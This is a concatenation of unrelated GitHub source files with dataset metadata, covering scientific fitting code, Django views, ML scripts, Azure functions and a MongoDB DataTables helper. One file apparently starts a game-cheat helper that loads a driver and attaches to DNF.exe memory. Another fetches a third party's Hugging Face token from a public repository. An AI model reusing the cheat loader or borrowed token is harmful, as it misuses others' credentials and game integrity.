ValueError(f\"'{stat_name}' can't be computed by vsf_props\")\n\n # first, look at quantities associated with stat_name\n prop_l = kernel.get_dset_props(dist_bin_edges, kwargs = stat_kw)\n for quan_name, dtype, shape in prop_l:\n key = (stat_name, quan_name)\n assert (key not in int64_quans) and (key not in float64_quans)\n if dtype == np.int64:\n int64_quans[key] = shape\n elif dtype == np.float64:\n float64_quans[key] = shape\n else:\n raise ValueError(f\"can't handle datatype: {dtype}\")\n\n # now, appropriately update StatList\n # kernel.get_dset_props would have raised an error if stat_kw had the\n # wrong size\n c_stat_name_buffer = ctypes.create_string_buffer(stat_name.encode())\n # attach c_stat_name_buffer to stat_list so it isn't garbage collected\n # during stat_list's lifetime\n stat_list._attach_object(c_stat_name_buffer)\n\n if len(stat_kw) == 0:\n stat_list.append(statistic_name_ptr = c_stat_name_buffer,\n arg_struct_ptr = None)\n elif stat_name == 'histogram':\n assert list(stat_kw) == ['val_bin_edges']\n val_bin_edges = np.asanyarray(stat_kw['val_bin_edges'],\n dtype = np.float64)\n if not _verify_bin_edges(val_bin_edges):\n raise ValueError(\n 'kwargs[\"val_bin_edges\"] must be a 1D monotonically '\n 'increasing array with 2 
or more values'\n )\n val_bins_struct = HISTBINS.construct(val_bin_edges)\n val_bins_ptr = _HISTBINS_ptr(val_bins_struct)\n\n accum_arg_ptr = ctypes.cast(val_bins_ptr, ctypes.c_void_p)\n stat_list.append(statistic_name_ptr = c_stat_name_buffer,\n arg_struct_ptr = accum_arg_ptr)\n stat_list._attach_object(val_bins_struct)\n else:\n raise RuntimeError(f\"There's no support for adding '{stat_name}' \"\n \"to stat_list\")\n\n return stat_list, VSFPropsRsltContainer(int64_quans = int64_quans,\n float64_quans = float64_quans)\n\ndef _validate_stat_kw_pairs(arg):\n if not isinstance(arg, Sequence):\n raise ValueError(\"stat_kw_pairs must be a sequence\")\n for elem in arg:\n if len(elem) != 2:\n raise ValueError(\"Each element in stat_kw_pairs must hold 2\"\n \"elements\")\n first, second = elem\n if (not isinstance(first, str)) or (not isinstance(second, dict)):\n raise ValueError(\"Each element in stat_kw_pairs must hold a \"\n \"string paired with a dict\")\n\ndef vsf_props(pos_a, pos_b, vel_a, vel_b, dist_bin_edges,\n stat_kw_pairs = [('variance', {})],\n nproc = 1, force_sequential = False,\n postprocess_stat = True):\n \"\"\"\n Calculates properties pertaining to the velocity structure function for \n pairs of points.\n\n If you set both ``pos_b`` and ``vel_b`` to ``None`` then the velocity \n structure properties will only be computed for unique pairs of the points\n specified by ``pos_a`` and ``vel_a``\n\n Parameters\n ----------\n pos_a, pos_b : array_like\n 2D arrays holding the positions of each point. Axis 0 should be the \n number of spatial dimensions must be consistent for each array. Axis 1\n can be different for each array\n vel_a, vel_b : array_like\n 2D arrays holding the velocities at each point. The shape of ``vel_a`` \n should match ``pos_a`` and the shape of ``vel_b`` should match\n ``pos_b``.\n dist_bin_edges : array_like\n 1D array of monotonically increasing values that represent edges for \n distance bins. A distance ``x`` lies in bin ``i`` if it lies in the \n interval ``dist_bin_edges[i] <= x < dist_bin_edges[i+1]``.\n stat_kw_pairs : sequence of (str, dict) tuples\n Each entry is a tuple holding the name of a statistic to compute and a\n dictionary of kwargs needed to compute that statistic. A list of valid\n statistics are described below. Unless we explicitly state otherwise,\n an empty dict should be passed for the kwargs.\n nproc : int, optional\n Number of processes to use for parallelizing this calculation. Default\n is 1. If the problem is small enough, the program may ignore this\n argument and use fewer processes.\n force_sequential : bool, optional\n `False` by default. When `True`, this forces the code to run with a\n single process (regardless of the value of `nproc`). However, the data\n is still partitioned as though it were using `nproc` processes. Thus,\n floating point results should be bitwise identical to an identical\n function call where this is `False`. (This is primarily provided for\n debugging purposes)\n postprocess_stat : bool, optional\n Users directly employing this function should almost always set this\n kwarg to `True` (the default). This option is only provided to simplify\n the process of consolidating results from multiple calls to vsf_props.\n\n Notes\n -----\n Currently recognized statistic names include:\n - 'mean': calculate the 1st order VSF.\n - 'variance': calculate the 1st and 2nd order VSFs\n - 'histogram': this constructs a 2D histogram. The bin edges along axis\n 0 are given by the `dist_bin_edges` argument. 
The magnitudes of the \n velocity differences are binned along axis 1. The 'val_bin_edges'\n keyword must be specified alongside this statistic. It should be\n associated with a 1D monotonic array that specifies the bin edges\n along axis 1.\n \"\"\"\n _validate_stat_kw_pairs(stat_kw_pairs)\n\n points_a = POINTPROPS.construct(pos_a, vel_a, dtype = np.float64,\n allow_null_pair = False)\n points_b = POINTPROPS.construct(pos_b, vel_b, dtype = np.float64,\n allow_null_pair = True)\n\n if pos_b is None:\n assert points_a.n_points > 1\n else:\n assert points_a.n_spatial_dims == points_b.n_spatial_dims\n\n if points_a.n_spatial_dims != 3:\n raise NotImplementedError(\n \"vsf_props currently only has support for computing velocity \"\n \"structure function properties for sets of points with 3 spatial \"\n \"dimensions\"\n )\n\n dist_bin_edges = np.asanyarray(dist_bin_edges, dtype = np.float64)\n if not _verify_bin_edges(dist_bin_edges):\n raise ValueError(\n 'dist_bin_edges must be a 1D monotonically increasing array with '\n '2 or more values'\n )\n ndist_bins = dist_bin_edges.size - 1\n\n stat_list, rslt_container = _process_statistic_args(stat_kw_pairs,\n dist_bin_edges)\n\n parallel_spec = PARALLELSPEC(nproc = nproc,\n force_sequential = force_sequential)\n\n # now actually call the function\n success = _lib.calc_vsf_props(\n points_a, points_b,\n stat_list.get_STATLISTITEM_ptr(), len(stat_list),\n dist_bin_edges, ndist_bins,\n parallel_spec,\n rslt_container.get_flt_vals_arr(),\n rslt_container.get_i64_vals_arr()\n )\n\n assert success\n\n out = []\n for stat_name, _ in stat_kw_pairs:\n val_dict = rslt_container.extract_statistic_dict(stat_name)\n\n if postprocess_stat:\n kernel = get_kernel(stat_name)\n kernel.postprocess_rslt(val_dict)\n out.append(val_dict)\n\n return out\n","repo_name":"mabruzzo/pyvsf","sub_path":"pyvsf/pyvsf.py","file_name":"pyvsf.py","file_ext":"py","file_size_in_byte":16412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9483534585","text":"from django.shortcuts import render\nfrom station.forms import StationForm \nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework.decorators import api_view\nfrom station.models import Station\n\n@api_view(['GET', 'POST'])\ndef station(request):\n \n if request.method == \"POST\":\n form = StationForm(request.data)\n form.is_valid()\n form = StationForm(request.data)\n #breakpoint()\n if form.is_valid:\n try: \n form.save()\n return redirect('/show') \n except: \n pass\n else: \n form = StationForm() \n return render(request,'index.html',{'form':form}) \n \ndef data(request): \n station = Station.objects.order_by('-id') \n return render(request,\"data.html\",{'station':station}) \n \ndef datashow(request):\n station = Station.objects.last()\n return render(request,\"datashow.html\",{'station':station}) ","repo_name":"Blifi/Station","sub_path":"station/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33822406985","text":"###Titulo: Reescrever função\n###Função: Este programa foi reescrito para adicionar uma mariável\n###Autor: Valmor Mantelli Jr.\n###Data: 24/11/20148\n###Versão: 0.0.1\n\n# Entrada dos dados\nsalário = 750\naumento = 0.15\n\nNovosalário = (salário * aumento) + salário\n\n#Saída de 
dados\nprint(Novosalário)\n","repo_name":"profnssorg/valmorMantelli1","sub_path":"exer206.py","file_name":"exer206.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19007280525","text":"\n#ETHAN ISAACS\n\nimport re\ndef split_line(line):\n return re.findall('[A-Za-z]+(?:\\'[A-Za-z]+)?', line)\ndictionary_words = []\nfile = open('../Notes/data/dictionary.txt', 'r')\nfor line in file:\n line = line.strip()\n dictionary_words.append(line)\ndef linear_search(key, dictionary):\n i = 0\n while i < len(dictionary) and dictionary[i] != key:\n i += 1\n if i < len(dictionary):\n return(False)\n else:\n return(True)\ndef binary_search(key, dictionary):\n lower_bound = 0\n upper_bound = len(dictionary) - 1\n found = False\n while lower_bound <= upper_bound and not found:\n middle_pos = (lower_bound + upper_bound) // 2\n if dictionary[middle_pos] < key:\n lower_bound = middle_pos + 1\n elif dictionary[middle_pos] > key:\n upper_bound = middle_pos - 1\n else:\n found = True\n if found:\n return(False)\n else:\n return(True)\nprint(\"Binary Search YAY\")\nalice_linefun = []\nalice_chapter1 = open('../Notes/data/AliceInWonderland200.txt', 'r')\nfor line in alice_chapter1:\n words = split_line(line.strip())\n alice_linefun.append(words)\nfor i in range(len(alice_linefun)):\n for word in alice_linefun[i]:\n found = binary_search(word.upper(), dictionary_words)\n if found:\n print(\"Line\", i, \"this word could be wrong bro!: \", word)\nprint(\"Linear Search YAY\")\nalice_fun = []\nalice_chapter1 = open('../Notes/data/AliceInWonderland200.txt', 'r')\nfor line in alice_chapter1:\n words = split_line(line.strip())\n alice_fun.append(words)\nfor i in range (len(alice_fun)):\n for word in alice_fun[i]:\n found = linear_search(word.upper(), dictionary_words)\n if found:\n print(\"Line\", i, \"this word could be wrong bro!: \", word)\n\nprint(\"Lewis Carroll fix these please\")\n\n","repo_name":"eisaacs21/Programming2_SP19","sub_path":"Searching/SPELL CHECK.py","file_name":"SPELL CHECK.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41192426072","text":"from PIL import Image\n\n# Pillow is deprecating the top-level resampling attributes (e.g., Image.BILINEAR) in\n# favor of the Image.Resampling enum. 
The top-level resampling attributes will be\n# removed in Pillow 10.\nif hasattr(Image, \"Resampling\"):\n _pil_interpolation_to_str = {\n Image.Resampling.NEAREST: \"nearest\",\n Image.Resampling.BILINEAR: \"bilinear\",\n Image.Resampling.BICUBIC: \"bicubic\",\n Image.Resampling.BOX: \"box\",\n Image.Resampling.HAMMING: \"hamming\",\n Image.Resampling.LANCZOS: \"lanczos\",\n }\nelse:\n _pil_interpolation_to_str = {\n Image.NEAREST: \"nearest\",\n Image.BILINEAR: \"bilinear\",\n Image.BICUBIC: \"bicubic\",\n Image.BOX: \"box\",\n Image.HAMMING: \"hamming\",\n Image.LANCZOS: \"lanczos\",\n }\n\n_str_to_pil_interpolation = {b: a for a, b in _pil_interpolation_to_str.items()}\n\n\nclass PIL_IMAGE_RESAMPLING:\n NEAREST = _str_to_pil_interpolation[\"nearest\"]\n BILINEAR = _str_to_pil_interpolation[\"bilinear\"]\n BICUBIC = _str_to_pil_interpolation[\"bicubic\"]\n BOX = _str_to_pil_interpolation[\"box\"]\n HAMMING = _str_to_pil_interpolation[\"hamming\"]\n LANCZOS = _str_to_pil_interpolation[\"lanczos\"]\n\n\ndef fetch_bytes(url_or_path):\n if str(url_or_path).startswith(\"http://\") or str(url_or_path).startswith(\n \"https://\"\n ):\n from urllib.request import urlopen\n\n return urlopen(url_or_path)\n return open(url_or_path, \"r\")\n\n\ndef fetch_huggingface_key():\n \"\"\"Fetch some huggingface token.\n Extracted from some colab notebook\n \"\"\"\n try:\n with fetch_bytes(\n \"https://raw.githubusercontent.com/WASasquatch/easydiffusion/main/key.txt\"\n ) as f:\n key = f.read().decode(\"utf-8\").split(\":\")\n except OSError as e:\n print(e)\n huggingface_username = key[0].strip()\n huggingface_token = key[1].strip()\n return huggingface_token\n","repo_name":"victor-estrade/play_with_stable_diffusion","sub_path":"stable_diffusion/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18608283456","text":"import pandas as pd \r\nimport numpy as np\r\nwine = pd.read_csv(r\"C:\\Users\\ANKIT\\Desktop\\Aradhana\\PCA\\wine.csv\")\r\nwine.describe()\r\nwine.head(10)\r\n\r\nfrom sklearn.decomposition import PCA\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.preprocessing import scale \r\n\r\n# Considering only numerical data \r\nwine.head(4)\r\n\r\n# Normalizing the numerical data \r\nwine_normal = scale(wine)\r\n\r\npca = PCA(n_components = 13)\r\npca_values = pca.fit_transform(wine_normal)\r\n\r\n\r\n# The amount of variance that each PCA explains is \r\nvar = pca.explained_variance_ratio_\r\nvar\r\npca.components_[0]\r\n\r\n# Cumulative variance \r\n\r\nvar1 = np.cumsum(np.round(var,decimals = 4)*100)\r\nvar1\r\n\r\n# Variance plot for PCA components obtained \r\nplt.plot(var1,color=\"red\")\r\n\r\n# plot between PCA1 and PCA2 \r\nx = pca_values[:,0]\r\ny = pca_values[:,1]\r\nz = pca_values[:2:3]\r\ncolor =np.random.rand(178)\r\n\r\nplt.scatter(x,y,color=[\"red\"])\r\nplt.show()\r\n\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nAxes3D.scatter(np.array(x),np.array(y),np.array(z),c=[\"green\",\"blue\",\"red\"])\r\n\r\n\r\n################### Clustering ##########################\r\nnew_df = pd.DataFrame(pca_values[:,0:4])\r\n\r\nfrom sklearn.cluster import KMeans\r\n\r\nkmeans = KMeans(n_clusters = 3)\r\nkmeans.fit(new_df)\r\nkmeans.labels_\r\n","repo_name":"Aradhana318/code","sub_path":"PCA.py","file_name":"PCA.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} 
+{"seq_id":"773970953","text":"from common import helper, globle, logger\nfrom driver import init_driver\nfrom game import mem, init\n\nif __name__ == '__main__':\n try:\n globle.cmd = \"cmd\"\n init_driver()\n logger.info(\"驱动加载成功\", 1)\n process_id = helper.get_process_id_by_name(\"DNF.exe\")\n if process_id == 0:\n helper.message_box(\"请打开dnf后运行\")\n exit()\n\n mem.set_process_id(process_id)\n init.init_empty_addr()\n logger.info(\"加载成功-欢迎使用\", 1)\n logger.info(\"当前时间:{}\".format(helper.get_now_date()), 1)\n init.hotkey2()\n except KeyboardInterrupt as e:\n pass\n except Exception as err:\n import sys\n import traceback\n\n except_type, _, except_traceback = sys.exc_info()\n print(except_type)\n print(err.args)\n print(except_traceback)\n print('-----------')\n for i in traceback.extract_tb(except_traceback):\n print(i)\n","repo_name":"xiaoyelj/DnfHelper-Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"74424627361","text":"import logging\nimport warnings\n\nimport azure.functions as func\nimport cv2\nimport numpy as np\nimport requests\nimport tflite_runtime.interpreter as tflite\n\nwarnings.filterwarnings(\"ignore\")\n\nmodel = tflite.Interpreter(model_path=\"mlcovid/model/model.tflite\")\nURL = (\n \"https://raw.githubusercontent.com/lyoh001/AzureStaticWebApps/main/mlcovid/images/\"\n)\n\nnormal = [1, 2, 4, 7, 8, 10, 13, 16, 19, 20, 22, 25, 28]\ncovid = [3, 6, 9, 12, 15, 18, 21, 24, 27, 30]\npneumonia = [5, 11, 14, 17, 23, 26, 29]\n\n\ndef predict_image(image_id):\n try:\n preprocessed_image = (\n np.array(\n cv2.imdecode(\n np.asarray(\n bytearray(requests.get(f\"{URL}{image_id}.jpg\").content),\n dtype=np.uint8,\n ),\n -1,\n )\n ).reshape(1, 224, 224, -1)\n / 255.0\n )\n except ConnectionError as e:\n return func.HttpResponse(\n status_code=400,\n body=f\"Connection Error: {e}\",\n )\n model.allocate_tensors()\n input_index = model.get_input_details()[0][\"index\"]\n input_tensor = preprocessed_image.astype(\"float32\")\n output_details = model.get_output_details()\n model.set_tensor(input_index, input_tensor)\n model.invoke()\n prediction = [\"Normal\", \"Covid\", \"Pneumonia\"][\n np.argmax(model.get_tensor(output_details[0][\"index\"])[0])\n ]\n return prediction\n\n\ndef main(req: func.HttpRequest) -> func.HttpResponse:\n logging.info(\"*******Starting main function*******\")\n logging.info(f\"Request query: {req.get_json()}\")\n payload = {\n k: [np.nan] if next(iter(v)) == \"\" else v for k, v in req.get_json().items()\n }\n try:\n image_id = int(next(iter(payload[\"image_id\"])))\n if not 1 <= image_id <= 30:\n return func.HttpResponse(\n status_code=200,\n body=\"Invalid input, please use a number between 1 and 30.\",\n )\n except ValueError:\n return func.HttpResponse(\n status_code=200,\n body=\"Invalid input, please use a number between 1 and 30.\",\n )\n\n actual = (\n \"Normal\"\n if image_id in normal\n else \"Covid\"\n if image_id in covid\n else \"Pneumonia\"\n )\n prediction = predict_image(image_id)\n logging.info(f\"Actual: {actual} | Prediction: {prediction}\")\n logging.info(\n f\"The AI predicts that the patient in the x-ray image is {'not infected with any disease' if prediction == 'Normal' else f'infected with {prediction}'}. Please note that the accuracy of the model will depend on the quality of the x-ray image and the size of the training dataset. 
If you are concerned about the accuracy of the prediction, you should consult with a medical professional.\"\n )\n\n return func.HttpResponse(\n status_code=200,\n body=f\"The AI predicts that the patient in the x-ray image is {'not infected with any disease' if prediction == 'Normal' else f'infected with {prediction}'}. Please note that the accuracy of the model will depend on the quality of the x-ray image and the size of the training dataset. If you are concerned about the accuracy of the prediction, you should consult with a medical professional.\",\n )\n","repo_name":"lyoh001/AzureFunctions","sub_path":"mlcovid/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22000435327","text":"\"\"\"Connect DataTables server side to a MongoDB database.\n\nSupports column sorting and filtering by search terms. Also supports custom filtering in case you want to manipulate\nthe search server side, for example send a value like days_til_expiration=60 and convert to Mongo search like\n{'ExpiryDate': {'$gt': ts, '$lt': ds}} where ts is today's date like 2017-09-12 and ds is today's date plus 60 days.\n\"\"\"\nimport json\nfrom bson.objectid import ObjectId\n\n\nclass DataTables(object):\n def __init__(self, pymongo_object, collection, request_args, **custom_filter):\n \"\"\"\n\n :param pymongo_object: The PyMongo object representing the connection to a Mongo instance.\n :param collection: The Mongo collection\n :param request_args: The args from DataTables, passed as Flask request.values.get('args')\n :param custom_filter: kwargs to be used as a custom Mongo filter, like key=value\n \"\"\"\n\n self.mongo = pymongo_object\n self.collection = collection\n self.request_args = request_args\n self.custom_filter = custom_filter\n\n @property\n def db(self):\n return self.mongo.db\n\n @property\n def search_terms(self):\n return str(self.request_args.get(\"search\")[\"value\"]).split()\n\n @property\n def search_terms_without_a_colon(self):\n return [term for term in self.search_terms if \":\" not in term]\n\n @property\n def search_terms_with_a_colon(self):\n return [term for term in self.search_terms if term.count(\":\") == 1]\n\n @property\n def dt_column_search(self):\n \"\"\"\n Adds support for datatables own column search functionality.\n\n documented here: https://datatables.net/manual/server-side\n\n :return:\n \"\"\"\n return [{\n \"column\": column['data'],\n \"value\": column['search']['value'],\n \"regex\": column['search']['regex']\n } for column in self.request_args.get(\"columns\") if column['search'][\"value\"] != \"\"]\n\n @property\n def requested_columns(self):\n return [column[\"data\"] for column in self.request_args.get(\"columns\")]\n\n @property\n def draw(self):\n return self.request_args.get(\"draw\")\n\n @property\n def start(self):\n return self.request_args.get(\"start\")\n\n @property\n def limit(self):\n _length = self.request_args.get(\"length\")\n if _length == -1:\n return None\n return _length\n\n @property\n def cardinality(self):\n return self.db[self.collection].count()\n\n @property\n def cardinality_filtered(self):\n return self.db[self.collection].find(self.filter).count()\n\n @property\n def order_dir(self):\n \"\"\"\n Return '1' for 'asc' or '-1' for 'desc'\n :return:\n \"\"\"\n _dir = self.request_args.get(\"order\")[0][\"dir\"]\n _MONGO_ORDER = {'asc': 1, 'desc': -1}\n return _MONGO_ORDER[_dir]\n\n @property\n def 
order_column(self):\n \"\"\"DataTables provides the index of the order column, but Mongo .sort wants its name.\n\n :return:\n \"\"\"\n _order_col = self.request_args.get(\"order\")[0][\"column\"]\n return self.requested_columns[_order_col]\n\n @property\n def projection(self):\n p = {}\n for key in self.requested_columns:\n p.update({key: {'$ifNull': ['$' + key, '']}})\n return p\n\n def search_specific_key(self):\n \"\"\"Search specific keys (columns) like 'key:value'.\n\n :return:\n \"\"\"\n _col_specific_search = {}\n\n for column_search in self.dt_column_search:\n col = column_search['column']\n term = column_search['value']\n\n if column_search.get(\"regex\", False) is True:\n _col_specific_search.update({col: {'$regex': term, '$options': 'i'}})\n else:\n _col_specific_search.update({col: term})\n\n # Putting the global search variant last, should overwrite all DT-searches\n for term in self.search_terms_with_a_colon:\n col, term = term.split(':')\n _col_specific_search.update({col: {'$regex': term, '$options': 'i'}})\n\n return _col_specific_search\n\n def search_query(self):\n \"\"\"Build the MongoDB query, searching every column for every term (case insensitive regex).\n\n :return:\n \"\"\"\n # D3\n _search_query = {}\n if self.search_terms_without_a_colon:\n # L2\n and_filter_on_all_terms = []\n for term in self.search_terms_without_a_colon:\n # D2\n or_filter = {}\n # L1\n or_filter_on_all_columns = []\n for column in self.requested_columns:\n # D1\n column_filter = {\n column: {'$regex': term, '$options': 'i'}\n }\n or_filter_on_all_columns.append(column_filter)\n or_filter['$or'] = or_filter_on_all_columns\n and_filter_on_all_terms.append(or_filter)\n\n _search_query['$and'] = and_filter_on_all_terms\n\n return _search_query\n\n @property\n def filter(self):\n _filter = {}\n _filter.update(self.custom_filter)\n _filter.update(self.search_query())\n _filter.update(self.search_specific_key())\n return _filter\n\n def results(self):\n\n _agg = [\n {'$match': self.filter},\n {'$sort': {self.order_column: self.order_dir}},\n {'$skip': self.start},\n {'$project': self.projection}\n ]\n\n if self.limit:\n _agg.append({'$limit': self.limit})\n\n _results = list(self.db[self.collection].aggregate(_agg))\n\n processed_results = []\n for result in _results:\n result = dict(result)\n result[\"DT_RowId\"] = str(result.pop('_id')) # rename the _id and convert ObjectId to str\n\n # go through every val in result and try to json.dumps objects and arrays - skip this if strings are okay\n for key, val in result.items():\n if type(val) in [list, dict, float]:\n result[key] = json.dumps(val)\n\n processed_results.append(result)\n\n return processed_results\n\n def get_rows(self):\n return {\n 'recordsTotal': str(self.cardinality),\n 'recordsFiltered': str(self.cardinality_filtered),\n 'draw': int(str(self.draw)), # cast draw as integer to prevent XSS\n 'data': self.results()\n }\n","repo_name":"pjosols/mongo-datatables","sub_path":"mongo_datatables/datatables.py","file_name":"datatables.py","file_ext":"py","file_size_in_byte":6571,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"54"} +{"seq_id":"11357692492","text":"# coding=utf-8\n\"\"\"Pytest customizations and fixtures for the quipucords tests.\"\"\"\n\nimport pytest\n\nfrom camayoc import utils\nfrom camayoc.config import get_config\n\n\ndef pytest_collection_modifyitems(\n session: pytest.Session, items: list[pytest.Item], config: pytest.Config\n) -> None:\n for clear_all_idx, node in 
enumerate(items):\n if node.nodeid.endswith(\"test_credentials.py::test_clear_all\"):\n break\n clear_all_node = items.pop(clear_all_idx)\n items.insert(0, clear_all_node)\n\n\n@pytest.fixture\ndef isolated_filesystem(request):\n \"\"\"Fixture that creates a temporary directory.\n\n Changes the current working directory to the created temporary directory\n for isolated filesystem tests.\n \"\"\"\n # Create isolated filesystem directory in the ssh_keyfile_path\n # configuration location if marked with `ssh_keyfile_path`.\n mark = request.node.get_closest_marker(\"ssh_keyfile_path\")\n ssh_keyfile_path = None\n if mark:\n cfg = get_config().get(\"qpc\", {})\n ssh_keyfile_path = cfg.get(\"ssh_keyfile_path\")\n if not ssh_keyfile_path:\n pytest.fail(\"QPC configuration 'ssh_keyfile_path' not provided or \" \"found\")\n with utils.isolated_filesystem(ssh_keyfile_path) as path:\n yield path\n","repo_name":"quipucords/camayoc","sub_path":"camayoc/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"40531277743","text":"import numpy as np\nfrom scipy.optimize import least_squares, fsolve\nfrom scipy.fftpack import fft, ifft, fftfreq\n\nfrom ._base_didv import _BaseDIDV, complexadmittance, get_i0, get_ibias, get_tes_bias_parameters_dict, get_tes_bias_parameters_dict_infinite_loop_gain\nfrom ._plot_didv import _PlotDIDV\nfrom ._uncertainties_didv import get_power_noise_with_uncertainties, get_dPdI_with_uncertainties\nfrom ._uncertainties_didv import get_smallsignalparams_cov, get_smallsignalparams_sigmas\n\n\n\n__all__ = [\n \"didvinitfromdata\",\n \"DIDV\",\n]\n\n\ndef didvinitfromdata(tmean, didvmean, didvstd, offset, offset_err, fs, sgfreq,\n sgamp, rsh, r0=0.3, rp=0.005, dutycycle=0.5,\n add180phase=False, dt0=1.5e-6):\n \"\"\"\n Function to initialize and process a dIdV dataset without having\n all of the traces, but just the parameters that are required for\n fitting. After running, this returns a DIDV class object that is\n ready for fitting.\n\n Parameters\n ----------\n tmean : ndarray\n The average trace in time domain, units of Amps\n didvstd : ndarray\n The complex standard deviation of the didv in frequency space\n for each frequency\n didvmean : ndarray\n The average trace converted to didv\n offset : float\n The offset (i.e. baseline value) of the didv trace, in Amps\n offset_err : float\n The error in the offset of the didv trace, in Amps\n fs : float\n Sample rate of the data taken, in Hz\n sgfreq : float\n Frequency of the signal generator, in Hz\n sgamp : float\n Peak-to-peak size of the square wave supplied by the signal\n generator, in Amps (equivalent to jitter in the QET bias)\n rsh : float\n Shunt resistance in the circuit, Ohms\n r0 : float, optional\n The estimated resistance of the TES in Ohms. Should be set if\n accurate small signal parameters are desired.\n rp : float, optional\n The estimated parasitic resistance of the non-shunt side of the\n TES circuit in Ohms. Should be set if accurate small signal\n parameters are desired.\n dutycycle : float, optional\n The duty cycle of the signal generator, should be a float\n between 0 and 1. Set to 0.5 by default\n add180phase : boolean, optional\n If the signal generator is out of phase (i.e. if it looks like\n --__ instead of __--), then this should be set to True. 
Adds\n half a period of the signal generator to the dt0 attribute.\n dt0 : float, optional\n The value of the starting guess for the time offset of the didv\n when fitting. The best way to use this value if it isn't\n converging well is to run the fit multiple times, setting `dt0`\n equal to the fit's next value, and seeing where the `dt0` value\n converges. The fit can have a difficult time finding the value\n on the first run if it the initial value is far from the actual\n value, so a solution is to do this iteratively.\n\n Returns\n -------\n didvobj : Object\n A DIDV class object that can be used to fit the dIdV and return\n the fit parameters.\n\n \"\"\"\n\n didvobj = DIDV(\n None,\n fs,\n sgfreq,\n sgamp,\n rsh,\n r0=r0,\n rp=rp,\n add180phase=add180phase,\n dt0=dt0,\n dutycycle=dutycycle,\n )\n\n didvobj._didvmean = didvmean\n didvobj._didvstd = didvstd\n didvobj._offset = offset\n didvobj._offset_err = offset_err\n didvobj._tmean = tmean\n didvobj._dt0 = dt0\n\n if didvobj._add180phase:\n didvobj._dt0 = didvobj._dt0 + 1 / (2 * didvobj._sgfreq)\n\n didvobj._time = np.arange(len(tmean)) / fs - didvobj._dt0\n didvobj._freq = np.fft.fftfreq(len(tmean), d=1.0 / fs)\n\n nbins = len(didvobj._tmean)\n nperiods = np.floor(nbins*didvobj._sgfreq/didvobj._fs)\n\n flatindstemp = list()\n for i in range(0, int(nperiods)):\n # get index ranges for flat parts of trace\n flatindlow = int(\n (float(i) + 0.25) * didvobj._fs / didvobj._sgfreq\n ) + int(didvobj._dt0 * didvobj._fs)\n flatindhigh = int(\n (float(i) + 0.48) * didvobj._fs / didvobj._sgfreq\n ) + int(didvobj._dt0 * didvobj._fs)\n flatindstemp.append(range(flatindlow, flatindhigh))\n flatinds = np.array(flatindstemp).flatten()\n\n didvobj._flatinds = flatinds[np.logical_and(\n flatinds > 0, flatinds < nbins,\n )]\n\n return didvobj\n\n\nclass DIDV(_BaseDIDV, _PlotDIDV):\n \"\"\"\n Class for fitting a didv curve for different types of models of the\n didv. Also gives various other useful values pertaining to the\n didv. This class supports doing 1, 2, and 3 pole fits. This is\n supported in a way that does one dataset at a time.\n\n \"\"\"\n\n def __init__(self, rawtraces, fs, sgfreq, sgamp, rsh, tracegain=1.0,\n r0=0.3, rp=0.005, dutycycle=0.5, add180phase=False,\n dt0=1.5e-6, autoresample=False):\n \"\"\"\n Initialization of the DIDV class object\n\n Parameters\n ----------\n rawtraces : ndarray\n The array of rawtraces to use when fitting the didv. Should\n be of shape (number of traces, length of trace in bins).\n This can be any units, as long as tracegain will convert\n this to Amps.\n fs : float\n Sample rate of the data taken, in Hz\n sgfreq : float\n Frequency of the signal generator, in Hz\n sgamp : float\n Peak-to-peak size of the square wave supplied by the signal\n generator, in Amps (equivalent to jitter in the QET bias)\n rsh : float\n Shunt resistance in the circuit, Ohms\n tracegain : float, optional\n The factor that the rawtraces should be divided by to\n convert the units to Amps. If rawtraces already has units\n of Amps, then this should be set to 1.0\n r0 : float, optional\n The estimated resistance of the TES in Ohms. Should be set\n if accurate small signal parameters are desired.\n rp : float, optional\n The estimated parasitic resistance of the non-shunt side of\n the TES circuit in Ohms. Should be set if accurate small\n signal parameters are desired.\n dutycycle : float, optional\n The duty cycle of the signal generator, should be a float\n between 0 and 1. 
Set to 0.5 by default\n add180phase : boolean, optional\n If the signal generator is out of phase (i.e. if it looks\n like --__ instead of __--), then this should be set to\n True. Adds half a period of the signal generator to the\n `dt0` attribute\n dt0 : float, optional\n The value of the starting guess for the time offset of the\n didv when fitting. The best way to use this value if it\n isn't converging well is to run the fit multiple times,\n setting dt0 equal to the fit's next value, and seeing where\n the dt0 value converges. The fit can have a difficult time\n finding the value on the first run if it the initial value\n is far from the actual value, so a solution is to do this\n iteratively.\n autoresample : bool, optional\n If True, the initialization will automatically resample\n the data so that `fs` / `sgfreq` is an integer, which\n ensures that an arbitrary number of signal-generator\n periods can fit in an integer number of time bins. See\n `qetpy.utils.resample_data` for more info.\n\n \"\"\"\n\n super().__init__(\n rawtraces,\n fs,\n sgfreq,\n sgamp,\n rsh,\n tracegain=tracegain,\n r0=r0,\n rp=rp,\n dutycycle=dutycycle,\n add180phase=add180phase,\n dt0=dt0,\n autoresample=autoresample,\n )\n\n\n @staticmethod\n def _fitdidv(freq, didv, 